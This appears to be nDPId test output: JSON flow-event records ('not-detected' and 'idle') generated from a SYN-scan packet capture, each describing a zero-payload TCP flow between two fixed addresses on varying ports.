-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 